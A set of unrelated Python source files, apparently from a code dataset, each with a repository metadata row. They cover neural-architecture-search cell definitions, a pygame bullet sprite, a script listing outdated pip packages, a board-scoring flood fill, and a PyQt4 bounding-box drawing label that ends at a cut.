                info.operations = [LayerTypes.IDENTITY] * n_in + ['reduction']
                info.down_sampling = 1
            else:
                if (skip_reduction_layer_input and ci-1 in reduction_layers and
                        ci > num_init_reductions):
                    # imagenet : do not take the input of regular reduction as skip connection.
                    info.inputs = (list(range(layer_id - n_normal_inputs - 1, layer_id - 2)) +
                        [layer_id - 1])
                else:
                    info.inputs = list(range(layer_id - n_normal_inputs, layer_id))
                n_in = len(info.inputs)
                info.operations = [LayerTypes.IDENTITY] * n_in + ['normal']
            master.append(info)
            layer_id += 1
        # aux_weight at the last cell before the last reduction
        if use_aux_head and len(reduction_layers) > 0:
            master[reduction_layers[-1] - 1 + n_inputs].aux_weight = 0.4
        master[-1].aux_weight = 1.0
        return master
    @staticmethod
    def from_str(ss):
        """Parse a CellNetworkInfo from a JSON string."""
        json_data = json.loads(ss)
        return CellNetworkInfo.from_json_loads(json_data)
    @staticmethod
    def from_json_loads(json_data):
        """Build a CellNetworkInfo from already-parsed JSON data.

        A bare list is interpreted as a master-only (macro) network.
        """
        net_info = CellNetworkInfo()
        if isinstance(json_data, list):
            net_info['master'] = LayerInfoList.from_json_loads(json_data)
            net_info.cell_names.append('master')
        else:
            for key in ['master', 'normal', 'reduction']:
                jd = json_data.get(key, None)
                if jd:
                    net_info[key] = LayerInfoList.from_json_loads(jd)
                    net_info.cell_names.append(key)
        return net_info
    @staticmethod
    def to_seq(rmi):
        # Stub: sequence encoding is not implemented for cell networks.
        return None
    @staticmethod
    def seq_to_img_flag(seq, max_depth=128, make_batcch=False):
        # Stub. NOTE(review): parameter name 'make_batcch' is a typo kept
        # for interface compatibility.
        return None
    @staticmethod
    def seq_to_hstr(rmi, not_exist_str='--'):
        # Stub: human-readable string encoding is not implemented.
        return None
    @staticmethod
    def str_to_seq(ss):
        # Composition of the stubs above; currently always returns None.
        return CellNetworkInfo.to_seq(CellNetworkInfo.from_str(ss))
def net_info_from_str(ss):
    """Parse a CellNetworkInfo from its string serialization.

    Legacy serializations joined cells with LayerInfoList.DELIM inside
    braces; those are rewritten into a JSON list before parsing.
    """
    is_legacy = ss[0] == '{' and ss[-1] == '}' and LayerInfoList.DELIM in ss
    if is_legacy:
        # this is for backward compatibility
        ss = '[ ' + ss.replace(LayerInfoList.DELIM, ' , ') + ' ]'
    return CellNetworkInfo.from_json_loads(json.loads(ss))
"""
Examples for resnet, nasnet-a
"""
def separable_resnet_cell_info(next_id=0, input_ids=(0, 1),
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """Build a minimal residual cell using one separable 3x3 conv.

    Args:
        next_id (int): base layer id; the new layer gets next_id + 2.
        input_ids: ids of the two cell inputs (default changed from a
            mutable list literal to a tuple; callers may still pass lists).
        end_merge: merge op the cell must end with (see ensure_end_merge).
    """
    LT = LayerTypes
    l_info = LayerInfoList(
        [
            LayerInfo(input_ids[0]),
            LayerInfo(input_ids[1]),
            # residual branch: sep-conv of the latest input summed with identity
            LayerInfo(
                next_id+2,
                inputs=[input_ids[1], input_ids[1]],
                operations=[
                    LT.SEPARABLE_CONV_3_2,
                    LT.IDENTITY,
                    LT.MERGE_WITH_SUM
                ]
            )
        ])
    return ensure_end_merge(l_info, end_merge)
separable_resnet_cell_info.n_inputs = 2
def basic_resnet_cell_info(next_id=0, input_ids=(0, 1),
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """Build a basic two-conv residual cell (conv3 -> conv3 + identity).

    Args:
        next_id (int): base layer id; new layers get next_id + 2 and + 3.
        input_ids: ids of the two cell inputs (default changed from a
            mutable list literal to a tuple; callers may still pass lists).
        end_merge: merge op the cell must end with (see ensure_end_merge).
    """
    LT = LayerTypes
    l_info = LayerInfoList(
        [
            LayerInfo(input_ids[0]),
            LayerInfo(input_ids[1]),
            # first conv of the residual branch
            LayerInfo(
                next_id+2,
                inputs=[input_ids[1]],
                operations=[
                    LT.CONV_3,
                    LT.MERGE_WITH_NOTHING
                ]
            ),
            # second conv, summed with the identity skip connection
            LayerInfo(
                next_id+3,
                inputs=[next_id+2, input_ids[1]],
                operations=[
                    LT.CONV_3,
                    LT.IDENTITY,
                    LT.MERGE_WITH_SUM
                ]
            )
        ])
    return ensure_end_merge(l_info, end_merge)
basic_resnet_cell_info.n_inputs = 2
def fully_connected_resnet_cell_info(next_id=0, input_ids=(0, 1),
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """Build a fully-connected residual cell (gated FC + identity sum).

    Args:
        next_id (int): base layer id; the new layer gets next_id + 2.
        input_ids: ids of the two cell inputs (default changed from a
            mutable list literal to a tuple; callers may still pass lists).
        end_merge: merge op the cell must end with (see ensure_end_merge).
    """
    LT = LayerTypes
    l_info = LayerInfoList(
        [
            LayerInfo(input_ids[0]),
            LayerInfo(input_ids[1]),
            LayerInfo(
                next_id+2, inputs=[input_ids[1]],
                operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
            )
        ])
    return ensure_end_merge(l_info, end_merge)
fully_connected_resnet_cell_info.n_inputs = 2
def fully_connected_rnn_base_cell_info(next_id=0, input_ids=[0,1],
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """
    See implementation of PetridishRNNCell to see an example of
    how this list of info is used.
    The first two info are x_and_h and init_layer, which is a
    projected x_and_h multiplied with gate.
    The rest of layers use specified operation to morph the layers.
    This is DARTS v2.

    NOTE(review): mutable default argument input_ids=[0,1] — benign here
    since it is never mutated, but a tuple would be safer.
    """
    LT = LayerTypes
    l_info = LayerInfoList(
        [
            LayerInfo(input_ids[0]), # next_id + 0
            LayerInfo(input_ids[1]), # next_id + 1
            # Layers 2..9: each applies one gated FC op to an earlier layer
            # and sum-merges it in.
            LayerInfo(
                next_id+2, inputs=[input_ids[1]],
                operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+3, inputs=[next_id+2],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+4, inputs=[next_id+2],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+5, inputs=[next_id+2],
                operations=[LT.FC_IDEN_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+6, inputs=[next_id+3],
                operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+7, inputs=[next_id+6],
                operations=[LT.FC_SGMD_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+8, inputs=[next_id+4],
                operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+9, inputs=[next_id+6],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            # Final layer averages all intermediate layers together.
            LayerInfo(
                next_id+10,
                inputs=[
                    next_id+1, next_id+2, next_id+3,
                    next_id+4, next_id+5, next_id+6,
                    next_id+7, next_id+8, next_id+9,],
                operations=[
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.MERGE_WITH_AVG]
            )
        ])
    return l_info
fully_connected_rnn_base_cell_info.n_inputs = 2
def darts_rnn_base_cell_info(
        next_id=0, input_ids=[0,1],
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """
    See implementation of PetridishRNNCell to see an example of
    how this list of info is used.
    The first two info are x_and_h and init_layer, which is a
    projected x_and_h multiplied with gate.
    The rest of layers use specified operation to morph the layers.
    This is DARTS from the paper writing

    NOTE(review): mutable default argument input_ids=[0,1] — benign here
    since it is never mutated, but a tuple would be safer.
    """
    LT = LayerTypes
    l_info = LayerInfoList(
        [
            LayerInfo(input_ids[0]), # next_id + 0
            LayerInfo(input_ids[1]), # next_id + 1
            # Layers 2..9: gated FC ops wired per the published DARTS RNN cell.
            LayerInfo(
                next_id+2, inputs=[input_ids[1]],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+3, inputs=[next_id+2],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+4, inputs=[next_id+3],
                operations=[LT.FC_TANH_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+5, inputs=[next_id+4],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+6, inputs=[next_id+5],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+7, inputs=[next_id+2],
                operations=[LT.FC_IDEN_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+8, inputs=[next_id+6],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            LayerInfo(
                next_id+9, inputs=[next_id+2],
                operations=[LT.FC_RELU_MUL_GATE, LT.MERGE_WITH_SUM]
            ),
            # Final layer averages all intermediate layers together.
            LayerInfo(
                next_id+10,
                inputs=[
                    next_id+1, next_id+2, next_id+3,
                    next_id+4, next_id+5, next_id+6,
                    next_id+7, next_id+8, next_id+9,],
                operations=[
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.IDENTITY, LT.IDENTITY, LT.IDENTITY,
                    LT.MERGE_WITH_AVG]
            )
        ])
    return l_info
darts_rnn_base_cell_info.n_inputs = 2
def resnet_bottleneck_cell_info(down_sampling=0):
    """Placeholder for a ResNet bottleneck cell.

    Raises:
        NotImplementedError: always; bottleneck blocks change filter
        counts inside the cell, which the representation cannot express.
    """
    raise NotImplementedError("not implemented due to changing filter sizes")
def nasneta_cell_info(
        next_id=0, input_ids=(0, 1),
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """Build the NASNet-A normal cell as a LayerInfoList.

    Args:
        next_id (int): base layer id; new layers get next_id + 2 .. + 7.
        input_ids: ids of the two cell inputs (default changed from a
            mutable list literal to a tuple; callers may still pass lists).
        end_merge: merge op for the final layer that concatenates all
            otherwise-unused layers (see cat_unused).
    """
    LT = LayerTypes
    l_info = LayerInfoList()
    l_info.extend([
        LayerInfo(input_ids[0]),
        LayerInfo(input_ids[1]),    # most recent layer
        LayerInfo(next_id+2, inputs=[input_ids[1], input_ids[0]],
            operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_3_2, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+3, inputs=[input_ids[0], input_ids[0]],
            operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_3_2, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+4, inputs=[input_ids[1], input_ids[0]],
            operations=[LT.AVGPOOL_3x3, LT.IDENTITY, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+5, inputs=[input_ids[0], input_ids[0]],
            operations=[LT.AVGPOOL_3x3, LT.AVGPOOL_3x3, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+6, inputs=[input_ids[1], input_ids[1]],
            operations=[LT.SEPARABLE_CONV_3_2, LT.IDENTITY, LT.MERGE_WITH_SUM]),
    ])
    # Final layer concatenates every layer no other layer consumed.
    l_info.append(cat_unused(l_info, next_id+7, end_merge))
    return l_info
nasneta_cell_info.n_inputs = 2
def nasnata_reduction_cell_info(
        next_id=0, input_ids=(0, 1),
        end_merge=LayerTypes.MERGE_WITH_CAT):
    """Build the NASNet-A reduction cell as a LayerInfoList.

    NOTE(review): public name keeps the historical 'nasnata' spelling for
    backward compatibility.

    Args:
        next_id (int): base layer id; new layers get next_id + 2 .. + 7.
        input_ids: ids of the two cell inputs (default changed from a
            mutable list literal to a tuple; callers may still pass lists).
        end_merge: merge op for the final layer that concatenates all
            otherwise-unused layers (see cat_unused).
    """
    LT = LayerTypes
    l_info = LayerInfoList()
    l_info.extend([
        LayerInfo(input_ids[0]),
        LayerInfo(input_ids[1]),    # most recent layer
        LayerInfo(next_id+2, inputs=[input_ids[1], input_ids[0]],
            operations=[LT.SEPARABLE_CONV_5_2, LT.SEPARABLE_CONV_7_2, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+3, inputs=[input_ids[1], input_ids[0]],
            operations=[LT.MAXPOOL_3x3, LT.SEPARABLE_CONV_7_2, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+4, inputs=[input_ids[1], input_ids[0]],
            operations=[LT.AVGPOOL_3x3, LT.SEPARABLE_CONV_5_2, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+5, inputs=[next_id+3, next_id+2],
            operations=[LT.IDENTITY, LT.AVGPOOL_3x3, LT.MERGE_WITH_SUM]),
        LayerInfo(next_id+6, inputs=[next_id+2, input_ids[1]],
            operations=[LT.SEPARABLE_CONV_3_2, LT.MAXPOOL_3x3, LT.MERGE_WITH_SUM]),
    ])
    # Final layer concatenates every layer no other layer consumed.
    l_info.append(cat_unused(l_info, next_id+7, end_merge))
    return l_info
nasnata_reduction_cell_info.n_inputs = 2
def cat_unused(layer_info_list, layer_id, end_merge):
    """Create a layer that end-merges every layer no other layer consumes.

    Removed the dead local ``layer_dict`` from the original (it was built
    but never read).

    NOTE(review): for input layers the set collects the enumeration index
    ``li`` while for other layers it collects layer *ids* — this mixes
    indices and ids when input ids differ from their positions; confirm
    the assumption that input layers sit at positions equal to their ids.

    Args:
        layer_info_list: existing LayerInfoList of the cell.
        layer_id (int): id to give the new merge layer.
        end_merge: merge op for the new layer (e.g. MERGE_WITH_CAT).

    Returns:
        LayerInfo that identity-passes each unused layer into `end_merge`.
    """
    is_used = set()
    for li, info in enumerate(layer_info_list):
        if LayerInfo.is_input(info):
            is_used.add(li)
            continue
        for in_id in info.inputs:
            is_used.add(in_id)
    inputs = [info.id for info in layer_info_list if info.id not in is_used]
    ops = [LayerTypes.IDENTITY] * (len(inputs) + 1)
    ops[-1] = end_merge
    info = LayerInfo(layer_id, inputs=inputs, operations=ops)
    return info
def ensure_end_merge(l_info, end_merge):
    """Guarantee that the cell's final layer merges with `end_merge`.

    If the last layer already uses `end_merge`, the list is returned
    unchanged; otherwise an identity layer ending in `end_merge` is
    appended. The list is modified in place and returned.
    """
    assert len(l_info) > 0, l_info
    if l_info[-1].merge_op == end_merge:
        return l_info
    tail_id = l_info[-1].id
    closing = LayerInfo(tail_id + 1, inputs=[tail_id],
                        operations=[LayerTypes.IDENTITY, end_merge])
    l_info.append(closing)
    return l_info
def replace_wsum_with_catproj(net_info):
    """Rewrite every weighted-sum merge into a concat-projection merge.

    Applies to the operable cells of `net_info` (normal/reduction when
    cell-based, otherwise master). Modifies `net_info` in place and
    returns it.
    """
    if net_info.is_cell_based():
        cell_lists = [lil for lil in (net_info.normal, net_info.reduction) if lil]
    else:
        cell_lists = [net_info.master]
    for lil in cell_lists:
        for info in lil:
            if info.merge_op == LayerTypes.MERGE_WITH_WEIGHTED_SUM:
                info.merge_op = LayerTypes.MERGE_WITH_CAT_PROJ
    return net_info
def add_aux_weight(net_info, aux_weight=0.4):
    """Attach an auxiliary-loss weight to the last cell before the last
    reduction layer of the master list.

    Scans the master list backwards; once a down-sampling layer has been
    seen, the first earlier non-final layer receives `aux_weight`.
    Modifies `net_info` in place and returns it.
    """
    final_id = net_info.master[-1].id
    seen_reduction = False
    for info in reversed(net_info.master):
        if info.down_sampling:
            seen_reduction = True
            continue
        if seen_reduction and info.id < final_id:
            info.aux_weight = aux_weight
            break
    return net_info
def net_info_cifar_to_ilsvrc(net_info, s_type, use_latest_input=False):
    """Adapt a CIFAR-sized network description to ILSVRC input resolution
    by inserting extra reduction layers after the inputs.

    Fix: the original silently hit a NameError when `s_type` was not one
    of the known stem types; an unknown value now raises ValueError.

    Args:
        net_info (CellNetworkInfo): network to modify in place.
        s_type (str): stem type — 'imagenet', 'basic', 'conv3' or 'conv7';
            determines how many reductions the stem already performs.
        use_latest_input (bool): if True, rewire all old input references
            to the newest inserted reduction instead of position-mapped ones.

    Returns:
        The modified `net_info` (also changed in place).
    """
    # if there are reduction cell, then use reduction cell twice.
    # if there are no reduction cell, then use s_type=imagenet
    assert isinstance(net_info, CellNetworkInfo), \
        "{} is not CellNetworkInfo.".format(net_info)
    # number of reduction that already happened in the stem.
    if s_type == 'imagenet':
        n_stem_reductions = 2
    elif s_type == 'basic':
        n_stem_reductions = 0
    elif s_type == 'conv3' or s_type == 'conv7':
        n_stem_reductions = 1
    else:
        raise ValueError("Unknown s_type: {}".format(s_type))
    n_model_reductions = sum(info.down_sampling for info in net_info.master)
    # number of reductions still required to reach the ILSVRC total of 5.
    n_extra_reductions = 5 - n_model_reductions - n_stem_reductions
    if n_extra_reductions <= 0:
        return net_info
    next_lid = max(info.id for info in net_info.master)
    n_inputs = 2
    layer_ids = [net_info.master[n_inputs - 1].id] * n_inputs
    is_cell_based = bool(net_info.get('reduction', None))
    l_to_insert = []
    for _ in range(n_extra_reductions):
        next_lid += 1
        if is_cell_based:
            operations = [LayerTypes.IDENTITY] * n_inputs + ['reduction']
        else:
            operations = [
                LayerTypes.SEPARABLE_CONV_7_2,
                LayerTypes.IDENTITY,
                LayerTypes.MERGE_WITH_SUM
            ]
        info = LayerInfo(
            next_lid,
            inputs=layer_ids[-n_inputs:],
            operations=operations,
            down_sampling=1)
        layer_ids.append(next_lid)
        l_to_insert.append(info)

    # rewire later layers that referenced the original inputs directly
    def mapped_input(old_idx):
        if use_latest_input:
            return layer_ids[n_extra_reductions + n_inputs - 1]
        return layer_ids[n_extra_reductions + old_idx]
    remap_dict = dict(
        (info.id, mapped_input(idx))
        for idx, info in enumerate(net_info.master[:n_inputs]))
    for info in net_info.master:
        for idx, inid in enumerate(info.inputs):
            newid = remap_dict.get(inid, None)
            if newid is not None:
                info.inputs[idx] = newid
    # insert the new reductions right after the input layers
    net_info.master[n_inputs:n_inputs] = l_to_insert
    return net_info
def increase_net_info_size(net_info, multiplier=2):
    """
    Increase the size of a macro net_info to be multiplier
    times of the original size. This is used after macro
    searching on small models to enable deeper models.
    Algorithm:
    1. We first find where the cells start and end, using
       _is_end_of_cell(). Check the assumptions there.
    2. For each cell, the inner cell connections are kept
       the same.
    3. The connections to previous end of cells are considered
       as relative.
    4. Each cell is repeated multiplier number of times,
       the repeats are inserted before the real one.
    Args:
        net_info : a CellNetworkInfo for macro search.
        multiplier (int or list of int) :
            If it is int, the number of times each normal cell is repeated.
            If it is a list, it is the periodic multiplier applied to each normal cell.
    return:
        A modified original net_info. Note that the original is changed.
    """
    l_info = net_info.master
    n_inputs = l_info.num_inputs()
    # indices (and original ids) of layers that end a cell; inputs count too.
    end_cell_indices = list(range(n_inputs))
    orig_end_cell_ids = [
        l_info[idx].id for idx in end_cell_indices
    ]
    next_id = 0
    for info in l_info:
        next_id = max(next_id, info.id)
    idx = start = n_inputs
    id_to_idx = dict()
    normal_cnt = 0
    if isinstance(multiplier, int):
        multiplier = [multiplier]
    while idx < len(l_info):
        # using while loop as l_info is getting longer
        id_to_idx[l_info[idx].id] = idx
        if not l_info._is_end_of_cell(idx):
            idx += 1
            continue
        # Reduction cells are never duplicated; only normal cells are.
        n_copies = 0
        if not l_info[idx].down_sampling:
            n_copies = multiplier[normal_cnt % len(multiplier)] - 1
            normal_cnt += 1
        cell_size = idx - start + 1
        # make copies.
        for cp_idx in range(n_copies):
            # Insert a deep copy of the current cell just before it, then
            # give the copied layers fresh ids and remapped inputs.
            l_info[start:start] = copy.deepcopy(l_info[start:idx+1])
            for info in l_info[start:idx+1]:
                next_id += 1
                info.id = next_id
                inputs = info.inputs
                for in_idx, in_id in enumerate(inputs):
                    if in_id in id_to_idx.keys():
                        # intra-cell connection: shift by the copies inserted so far
                        idx_in_l_info = id_to_idx[in_id] + cp_idx * cell_size
                    else:
                        # connection to a previous cell end: treat as relative
                        n_prev = None
                        for _i, _id in enumerate(reversed(orig_end_cell_ids)):
                            if _id == in_id:
                                n_prev = _i + 1
                                break
                        idx_in_l_info = end_cell_indices[-n_prev]
                    inputs[in_idx] = l_info[idx_in_l_info].id
                info.inputs = inputs
                # copied cells never produces aux predictions.
                info.aux_weight = 0
            end_cell_indices.append(idx)
            start = idx + 1
            idx += cell_size
        # modify the original for the cell connections
        for info in l_info[start:idx+1]:
            inputs = info.inputs
            for in_idx, in_id in enumerate(inputs):
                if in_id not in id_to_idx.keys():
                    n_prev = None
                    for _i, _id in enumerate(reversed(orig_end_cell_ids)):
                        if _id == in_id:
                            n_prev = _i + 1
                            break
                    inputs[in_idx] = l_info[end_cell_indices[-n_prev]].id
            info.inputs = inputs
        end_cell_indices.append(idx)
        orig_end_cell_ids.append(l_info[idx].id)
        id_to_idx = dict()
        idx = start = end_cell_indices[-1] + 1
        #end while
    net_info.master = l_info
    return net_info
| microsoft/petridishnn | petridish/info/net_info.py | net_info.py | py | 27,723 | python | en | code | 111 | github-code | 36 |
5850629924 | #coding: utf-8
import pygame
from block import Block
import constants
#insert this class in ship method gen_shoot()
class Bullet(Block):
    """A projectile that travels vertically and destroys targets it hits.

    Collisions with `targets_nopoints` destroy the target and the bullet;
    collisions with `targets_points` additionally award each destroyed
    target's `value` to `point_receptor`.

    Fixes: replaced `!= None` comparisons with `is not None`, and removed
    the no-op `del self` (deleting a local name has no effect).
    """
    def __init__(self, x, y, sign, speed, targets_nopoints=None, targets_points=None, point_receptor=None):
        """Create a bullet at (x, y).

        Parameters:
            x, y: initial position.
            sign: +1 fires upward (negative y direction), -1 downward.
            speed: pixels moved per update.
            targets_nopoints (pygame.sprite.Group): destroyed on hit, no score.
            targets_points (pygame.sprite.Group): destroyed on hit; members
                must have a `value` attribute.
            point_receptor: must provide change_points_by(points); only used
                when targets_points is a valid Group.
        """
        super(Bullet, self).__init__(x, y, 10, 10, constants.YELLOW)
        self.dir_x = 0
        self.dir_y = -1 * sign * speed
        # Accept only real sprite Groups; anything else disables that target set.
        if isinstance(targets_nopoints, pygame.sprite.Group):
            self.t_n_points = targets_nopoints
        else:
            self.t_n_points = None
        if isinstance(targets_points, pygame.sprite.Group):
            self.t_w_points = targets_points        # members must have .value
            self.point_receptor = point_receptor    # must have change_points_by(x)
        else:
            self.t_w_points = None

    def update(self):
        """Advance one step, despawn off-screen, and resolve collisions."""
        self.rect.y += self.dir_y
        # Despawn once the bullet leaves the screen vertically.
        if self.rect.y < 0 or self.rect.y >= constants.SCREEN_HEIGHT:
            self.kill()  # removes the sprite from ALL pygame Groups
            return
        if self.t_n_points is not None:
            # dokill=True: colliding obstacles are destroyed by spritecollide.
            collision_list = pygame.sprite.spritecollide(self, self.t_n_points, True)
            if len(collision_list) > 0:
                self.kill()
        if self.t_w_points is not None:
            collision_list = pygame.sprite.spritecollide(self, self.t_w_points, True)
            if len(collision_list) > 0:
                self.kill()
                for el in collision_list:
                    self.point_receptor.change_points_by(el.value)
| RafaelPAndrade/Pixel_Martians | bullet.py | bullet.py | py | 1,487 | python | en | code | 0 | github-code | 36 |
12546585829 | """
ospopen.py
This programs lists your outdated Python packages and the latest version available.
"""
import sys
import os
infile = os.popen("/Library/Frameworks/Python.framework/Versions/3.6/bin"
"/pip3 list -o") #Create a child process and a pipe.
lines = infile.readlines() #lines is a list of lines.
status = infile.close()
if status != None: #status is supposed to be None.
print("\"pip3 list -o\" produced exit status", status)
sys.exit(1)
lines = [line.rstrip() for line in lines] #Remove trailing newline.
for i, line in enumerate(lines, start = 1):
print("{} {}".format(i, line))
print()
print("You have", i , "outdated Python librairies.")
sys.exit(0)
| zeeboo26/Python-INFO1-CE9990 | ospopen.py | ospopen.py | py | 822 | python | en | code | 0 | github-code | 36 |
def boardScore(A):
    """Score a board of cells like 'A3' (letter = region label, digits = points).

    The board is given as rows of space-separated cells. For each
    4-connected region of equal labels, the region contributes
    (sum of its cell points) * (number of cells). Returns the total.
    """
    grid = [row.split() for row in A]
    rows, cols = len(grid), len(grid[0])
    total = 0
    for r in range(rows):
        for c in range(cols):
            label = grid[r][c][0]
            if label == '#':        # already consumed by an earlier region
                continue
            # Iterative flood fill over the region containing (r, c).
            region_score = 0
            region_area = 0
            stack = [(r, c)]
            while stack:
                i, j = stack.pop()
                if not (0 <= i < rows and 0 <= j < cols):
                    continue
                cell = grid[i][j]
                if not cell or cell == '#' or cell[0] != label:
                    continue
                region_score += int(cell[1:])
                region_area += 1
                grid[i][j] = '#'    # mark visited
                stack.extend(((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)))
            total += region_score * region_area
    return total
# Fix: extraction garbage was fused onto the final line, breaking the syntax.
print(boardScore(["S0 W1 W1 W0 L2",
                  "W0 W0 T0 T0 T0",
                  "W0 W1 T0 M2 M1",
                  "S0 L0 S1 S0 S0",
                  "M0 R2 R0 S1 T0"]))
43494226202 | from PyQt4 import QtGui, QtCore
#
#
# class RubberbandEnhancedLabel(QtGui.QLabel):
#
# def __init__(self, parent=None):
# QtGui.QLabel.__init__(self, parent)
# self.selection = QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self)
#
# def mousePressEvent(self, event):
# '''
# Mouse is pressed. If selection is visible either set dragging mode (if close to border) or hide selection.
# If selection is not visible make it visible and start at this point.
# '''
#
# if event.button() == QtCore.Qt.LeftButton:
#
# position = QtCore.QPoint(event.pos())
# if self.selection.isVisible():
# # visible selection
# if (self.upper_left - position).manhattanLength() < 20:
# # close to upper left corner, drag it
# self.mode = "drag_upper_left"
# elif (self.lower_right - position).manhattanLength() < 20:
# # close to lower right corner, drag it
# self.mode = "drag_lower_right"
# else:
# # clicked somewhere else, hide selection
# #self.selection.show()#hide()
# pass
# else:
# # no visible selection, start new selection
# self.upper_left = position
# self.lower_right = position
# self.mode = "drag_lower_right"
# self.selection.show()
#
# def mouseMoveEvent(self, event):
# '''
# Mouse moved. If selection is visible, drag it according to drag mode.
# '''
# if self.selection.isVisible():
# # visible selection
# if self.mode is "drag_lower_right":
# self.lower_right = QtCore.QPoint(event.pos())
# elif self.mode is "drag_upper_left":
# self.upper_left = QtCore.QPoint(event.pos())
# # update geometry
# self.selection.setGeometry(QtCore.QRect(self.upper_left, self.lower_right).normalized())
#
#
#
from pyqtgraph import *
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
class RubberbandEnhancedLabelMultiple(QtGui.QLabel):
    """QLabel on which the user can draw, drag and recolour multiple
    rubber-band bounding boxes with the mouse.

    The per-box state lives in index-aligned parallel lists:
    ``selections`` (QRubberBand widgets), ``upper_left``/``lower_right``
    (corner QPoints), ``mode`` (current drag state), ``category``
    (colour/class index) and ``id`` (box identifier).  Every method that
    adds or removes a box must keep these lists the same length.
    """

    def __init__(self, parent=None):
        self.max_bboxes = 10
        QtGui.QLabel.__init__(self, parent)
        self.selections = []          # one QRubberBand per box
        self.active_bboxes = 0        # number of live boxes
        self.upper_left = []          # QPoint: top-left corner per box
        self.lower_right = []         # QPoint: bottom-right corner per box
        self.mode = []                # per-box drag state: "drag_upper_left" / "drag_lower_right" / " "
        self.category = []            # per-box colour/category index (see change_color)
        self.reg = 0                  # category assigned to newly drawn boxes
        self.color = QtGui.QColor('red')
        self.curr_id = 0              # next id to hand out
        self.id = []                  # per-box id
        self._pixmap = QPixmap(self.width(), self.height())

    def change_color(self, i):
        """Select category *i*; newly drawn boxes use its colour."""
        d = {0: QtGui.QColor('red'), 1: QtGui.QColor('blue'), 2: QtGui.QColor('green'), 3: QtGui.QColor('black')}
        self.color = QtGui.QColor(d[i])
        self.reg = i

    def mousePressEvent(self, event):
        '''
        Mouse pressed.  If the click lands near a corner of an existing,
        visible box (closest corner within 50 px) start dragging that
        corner; otherwise start a brand-new box at the click position.
        '''
        if event.button() == QtCore.Qt.LeftButton:
            print ("press")
            position = QtCore.QPoint(event.pos())
            # Find the visible box corner closest to the click.
            min_i = 0
            min_sh = 10000
            string = "saaaas"   # sentinel; overwritten whenever min_sh shrinks
            for i, sel in enumerate(self.selections):
                if sel.isVisible():
                    dist_ul = (self.upper_left[i] - position).manhattanLength()
                    if dist_ul < min_sh:
                        min_sh = dist_ul
                        min_i = i
                        string = "drag_upper_left"
                    dist_lr = (self.lower_right[i] - position).manhattanLength()
                    if dist_lr < min_sh:
                        min_sh = dist_lr
                        min_i = i
                        string = "drag_lower_right"
            print ('loop 1')
            if min_sh < 50:
                # Close enough to an existing corner: drag that corner.
                self.mode[min_i] = string
            else:
                # Start a new (degenerate until the mouse moves) box,
                # appending to every parallel list to keep them aligned.
                print (len(self.selections))
                self.selections.append(QtGui.QRubberBand(QtGui.QRubberBand.Rectangle, self))
                self.category.append(self.reg)
                self.upper_left.append(position)
                self.lower_right.append(position)
                self.mode.append("drag_lower_right")
                self.selections[-1].setGeometry(QtCore.QRect(self.upper_left[-1], self.lower_right[-1]).normalized())
                self.selections[-1].show()
                self.id.append(self.curr_id)
                if self.reg != 3:   # category 3 boxes do not consume a new id
                    self.curr_id += 1
                self.active_bboxes += 1
                print ("new", self.active_bboxes)
            self.update()   # repaint the translucent fills

    def mouseMoveEvent(self, event):
        '''
        Mouse moved: drag the corner recorded in self.mode for every
        visible box and refresh its rubber-band geometry.
        '''
        for i in range(self.active_bboxes):
            if self.selections[i].isVisible():
                if self.mode[i] == "drag_lower_right":
                    self.lower_right[i] = QtCore.QPoint(event.pos())
                elif self.mode[i] == "drag_upper_left":
                    self.upper_left[i] = QtCore.QPoint(event.pos())
                self.selections[i].setGeometry(QtCore.QRect(self.upper_left[i], self.lower_right[i]).normalized())
        # Schedule a repaint here (NOT inside paintEvent) so the coloured
        # fills follow the new geometry.
        self.update()

    def mouseReleaseEvent(self, event):
